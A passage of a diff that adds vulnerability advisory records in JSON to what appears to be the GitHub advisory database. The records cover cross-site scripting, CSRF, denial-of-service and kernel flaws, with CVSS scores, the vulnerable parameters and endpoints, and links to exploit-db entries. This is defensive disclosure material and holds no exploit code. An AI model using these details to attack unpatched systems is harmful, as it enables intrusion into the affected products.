"https://raw.githubusercontent.com/OpenSatKit/OpenSatKit/master/cfs/apps/filemgr/fsw/src/dir.c" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/OpenSatKit/OpenSatKit/master/cfs/apps/filemgr/fsw/src/dir.c#:~:text=strcpy%28DirWithSep" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T18:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qwww-xqmh-8p6x/GHSA-qwww-xqmh-8p6x.json b/advisories/unreviewed/2026/02/GHSA-qwww-xqmh-8p6x/GHSA-qwww-xqmh-8p6x.json new file mode 100644 index 0000000000000..2dbcea80f7b8f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qwww-xqmh-8p6x/GHSA-qwww-xqmh-8p6x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwww-xqmh-8p6x", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25403" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input to the comment parameter. Attackers can inject JavaScript code through the admin_profiles endpoint that executes in the browsers of other users who view the affected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25403" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-stored-cross-site-scripting-via-adminprofiles" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx29-45jr-5q3q/GHSA-qx29-45jr-5q3q.json b/advisories/unreviewed/2026/02/GHSA-qx29-45jr-5q3q/GHSA-qx29-45jr-5q3q.json new file mode 100644 index 0000000000000..54557406e460d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx29-45jr-5q3q/GHSA-qx29-45jr-5q3q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx29-45jr-5q3q", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2025-14851" + ], + "details": "The YaMaps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `yamap` shortcode parameters in all versions up to, and including, 0.6.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14851" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yamaps/tags/0.6.40/includes/shortcodes.php#L194" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/yamaps/tags/0.6.40/includes/shortcodes.php#L195" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3440575%40yamaps&new=3440575%40yamaps&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0b84c2a-7297-4d96-8fa7-638b2b9953f4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx2f-v62g-3w7p/GHSA-qx2f-v62g-3w7p.json b/advisories/unreviewed/2026/02/GHSA-qx2f-v62g-3w7p/GHSA-qx2f-v62g-3w7p.json new file mode 100644 index 0000000000000..73037924495cd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx2f-v62g-3w7p/GHSA-qx2f-v62g-3w7p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx2f-v62g-3w7p", + "modified": "2026-02-19T15:30:35Z", + "published": "2026-02-19T15:30:35Z", + "aliases": [ + "CVE-2019-25423" + ], + "details": "Comodo Dome Firewall 2.7.0 contains multiple reflected cross-site scripting vulnerabilities in the /korugan/proxyconfig endpoint that allow attackers to inject malicious scripts through POST parameters. Attackers can submit crafted POST requests with JavaScript payloads in parameters like PROXY_PORT, VISIBLE_HOSTNAME, ADMIN_MAIL_ADDRESS, CACHE_MEM, MAX_SIZE, MIN_SIZE, and DST_NOCACHE to execute arbitrary scripts in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25423" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-cross-site-scripting-via-proxyconfig" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qx68-hf7m-xmfg/GHSA-qx68-hf7m-xmfg.json b/advisories/unreviewed/2026/02/GHSA-qx68-hf7m-xmfg/GHSA-qx68-hf7m-xmfg.json new file mode 100644 index 0000000000000..5ab6900916702 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qx68-hf7m-xmfg/GHSA-qx68-hf7m-xmfg.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qx68-hf7m-xmfg", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25397" + ], + "details": "IPFire 2.21 Core Update 127 contains multiple reflected cross-site scripting vulnerabilities in the hosts.cgi script that allow attackers to inject malicious scripts through unvalidated parameters. Attackers can submit POST requests with script payloads in the KEY1, IP, HOST, or DOM parameters to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25397" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-cross-site-scripting-via-hostsc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json new file mode 100644 index 0000000000000..48a6c66996eda --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxf4-rqx4-9mqj", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37158" + ], + "details": "AVideo Platform 8.1 contains a cross-site request forgery vulnerability that allows attackers to reset user passwords by exploiting the password recovery mechanism. Attackers can craft malicious requests to the recoverPass endpoint using the user's recovery token to change account credentials without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37158" + }, + { + "type": "WEB", + "url": "https://avideo.com" + }, + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/48003" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avideo-platform-cross-site-request-forgery-password-reset" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352", + "CWE-640" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxhj-mrxj-g3gj/GHSA-qxhj-mrxj-g3gj.json b/advisories/unreviewed/2026/02/GHSA-qxhj-mrxj-g3gj/GHSA-qxhj-mrxj-g3gj.json new file mode 100644 index 0000000000000..20b1486477775 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qxhj-mrxj-g3gj/GHSA-qxhj-mrxj-g3gj.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxhj-mrxj-g3gj", + "modified": "2026-02-13T21:31:37Z", + "published": "2026-02-13T21:31:37Z", + "aliases": [ + "CVE-2025-20089" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20089" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json b/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json index 4f85327475fc1..eaa933b28c760 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json +++ b/advisories/unreviewed/2026/02/GHSA-qxp9-w6x3-f25v/GHSA-qxp9-w6x3-f25v.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-qxv5-rwp8-8gff/GHSA-qxv5-rwp8-8gff.json b/advisories/unreviewed/2026/02/GHSA-qxv5-rwp8-8gff/GHSA-qxv5-rwp8-8gff.json new file mode 100644 index 0000000000000..937cbd4f273a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qxv5-rwp8-8gff/GHSA-qxv5-rwp8-8gff.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qxv5-rwp8-8gff", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23605" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Attachment Filtering rule creation workflow. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pv1$TXB_RuleName parameter to /MailEssentials/pages/MailSecurity/attachmentchecking.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23605" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-attachment-filtering-rule-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json new file mode 100644 index 0000000000000..7f5cad051600a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r264-whc7-wwfw/GHSA-r264-whc7-wwfw.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r264-whc7-wwfw", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71226" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: Implement settime64 as stub for MVM/MLD PTP\n\nSince commit dfb073d32cac (\"ptp: Return -EINVAL on ptp_clock_register if\nrequired ops are NULL\"), PTP clock registered through ptp_clock_register\nis required to have ptp_clock_info.settime64 set, however, neither MVM\nnor MLD's PTP clock implementation sets it, resulting in warnings when\nthe interface starts up, like\n\nWARNING: drivers/ptp/ptp_clock.c:325 at ptp_clock_register+0x2c8/0x6b8, CPU#1: wpa_supplicant/469\nCPU: 1 UID: 0 PID: 469 Comm: wpa_supplicant Not tainted 6.18.0+ #101 PREEMPT(full)\nra: ffff800002732cd4 iwl_mvm_ptp_init+0x114/0x188 [iwlmvm]\nERA: 9000000002fdc468 ptp_clock_register+0x2c8/0x6b8\niwlwifi 0000:01:00.0: Failed to register PHC clock (-22)\n\nI don't find an appropriate firmware interface to implement settime64()\nfor iwlwifi MLD/MVM, thus instead create a stub that returns\n-EOPTNOTSUPP only, suppressing the warning and allowing the PTP clock to\nbe registered.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71226" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/81d90d93d22ca4f61833cba921dce9a0bd82218f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ff6892ea544c4052dd5799f675ebc20419953801" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json b/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json new file mode 100644 index 0000000000000..7b987ebbf02ee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r28c-wjwj-4xgv/GHSA-r28c-wjwj-4xgv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r28c-wjwj-4xgv", + "modified": "2026-02-12T18:30:22Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2025-67135" + ], + "details": "Weak Security in the PF-50 1.2 keyfob of PGST PG107 Alarm System 1.25.05.hf allows attackers to compromise access control via a code replay attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67135" + }, + { + "type": "WEB", + "url": "https://neutsec.io/advisories/cve-2025-67135" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-294" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r29v-5x2x-xjh8/GHSA-r29v-5x2x-xjh8.json b/advisories/unreviewed/2026/02/GHSA-r29v-5x2x-xjh8/GHSA-r29v-5x2x-xjh8.json new file mode 100644 index 0000000000000..50b17215dd464 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r29v-5x2x-xjh8/GHSA-r29v-5x2x-xjh8.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r29v-5x2x-xjh8", + "modified": "2026-02-19T00:30:28Z", + "published": "2026-02-19T00:30:28Z", + "aliases": [ + "CVE-2019-25350" + ], + "details": "XMedia Recode 3.4.8.6 contains a denial of service vulnerability that allows attackers to crash the application by loading a specially crafted .m3u playlist file. Attackers can create a malicious .m3u file with an oversized buffer to trigger an application crash when the file is opened.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25350" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47679" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xmedia-recode-mu-denial-of-service" + }, + { + "type": "WEB", + "url": "https://www.xmedia-recode.de" + }, + { + "type": "WEB", + "url": "https://www.xmedia-recode.de/download.php" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json b/advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json new file mode 100644 index 0000000000000..6a497361d70b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2c7-m48p-r86q/GHSA-r2c7-m48p-r86q.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2c7-m48p-r86q", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37213" + ], + "details": "TextCrawler Pro 3.1.1 contains a denial of service vulnerability that allows attackers to crash the application by sending an oversized buffer in the license key field. Attackers can generate a 6000-byte payload and paste it into the activation field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37213" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk/index.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47862" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/textcrawler-pro-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json b/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json new file mode 100644 index 0000000000000..be83da381f450 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2c9-g9pr-hc37/GHSA-r2c9-g9pr-hc37.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2c9-g9pr-hc37", + "modified": "2026-02-13T21:31:34Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20601" + ], + "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.3. An app may be able to monitor keystrokes without user permission.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20601" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2mp-m756-xr9v/GHSA-r2mp-m756-xr9v.json b/advisories/unreviewed/2026/02/GHSA-r2mp-m756-xr9v/GHSA-r2mp-m756-xr9v.json new file mode 100644 index 0000000000000..864d5560313f4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2mp-m756-xr9v/GHSA-r2mp-m756-xr9v.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2mp-m756-xr9v", + "modified": "2026-02-13T21:31:38Z", + "published": "2026-02-13T21:31:38Z", + "aliases": [ + "CVE-2025-32082" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32082" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json b/advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json new file mode 100644 index 0000000000000..6aa7f6d42b856 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r2ww-vx8x-gqmg/GHSA-r2ww-vx8x-gqmg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r2ww-vx8x-gqmg", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37178" + ], + "details": "KeePass Password Safe versions before 2.44 contain a denial of service vulnerability in the help system's HTML handling. Attackers can trigger the vulnerability by dragging and dropping malicious HTML files into the help area, potentially causing application instability or crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37178" + }, + { + "type": "WEB", + "url": "https://keepass.info" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47952" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/keepass-denial-of-service-poc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r35m-5r25-v2fx/GHSA-r35m-5r25-v2fx.json b/advisories/unreviewed/2026/02/GHSA-r35m-5r25-v2fx/GHSA-r35m-5r25-v2fx.json new file mode 100644 index 0000000000000..d709d9581a2e9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r35m-5r25-v2fx/GHSA-r35m-5r25-v2fx.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r35m-5r25-v2fx", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23189" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix NULL pointer dereference in ceph_mds_auth_match()\n\nThe CephFS kernel client has regression starting from 6.18-rc1.\nWe have issue in ceph_mds_auth_match() if fs_name == NULL:\n\n const char fs_name = mdsc->fsc->mount_options->mds_namespace;\n ...\n if (auth->match.fs_name && strcmp(auth->match.fs_name, fs_name)) {\n / fsname mismatch, try next one */\n return 0;\n }\n\nPatrick Donnelly suggested that: In summary, we should definitely start\ndecoding `fs_name` from the MDSMap and do strict authorizations checks\nagainst it. Note that the `-o mds_namespace=foo` should only be used for\nselecting the file system to mount and nothing else. It's possible\nno mds_namespace is specified but the kernel will mount the only\nfile system that exists which may have name \"foo\".\n\nThis patch reworks ceph_mdsmap_decode() and namespace_equals() with\nthe goal of supporting the suggested concept. Now struct ceph_mdsmap\ncontains m_fs_name field that receives copy of extracted FS name\nby ceph_extract_encoded_string(). For the case of \"old\" CephFS file\nsystems, it is used \"cephfs\" name.\n\n[ idryomov: replace redundant %*pE with %s in ceph_mdsmap_decode(),\n get rid of a series of strlen() calls in ceph_namespace_match(),\n drop changes to namespace_equals() body to avoid treating empty\n mds_namespace as equal, drop changes to ceph_mdsc_handle_fsmap()\n as namespace_equals() isn't an equivalent substitution there ]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23189" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/57b36ffc8881dd455d875f85c105901974af2130" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7987cce375ac8ce98e170a77aa2399f2cf6eb99f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c6f8326f26bd20d648d9a55afd68148d1b6afe28" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": 